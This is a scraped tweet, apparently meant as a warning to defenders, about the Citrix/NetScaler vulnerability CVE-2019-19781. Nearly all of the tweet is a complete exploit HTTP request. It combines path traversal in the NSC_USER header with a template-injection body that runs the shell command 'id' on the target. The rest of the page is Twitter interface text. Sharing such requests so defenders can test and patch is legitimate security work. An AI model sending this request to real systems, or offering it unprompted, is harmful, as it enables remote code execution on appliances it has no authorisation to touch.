For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+http://template.new ({'BLOCK'='print+`id`'})%]
-
-
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.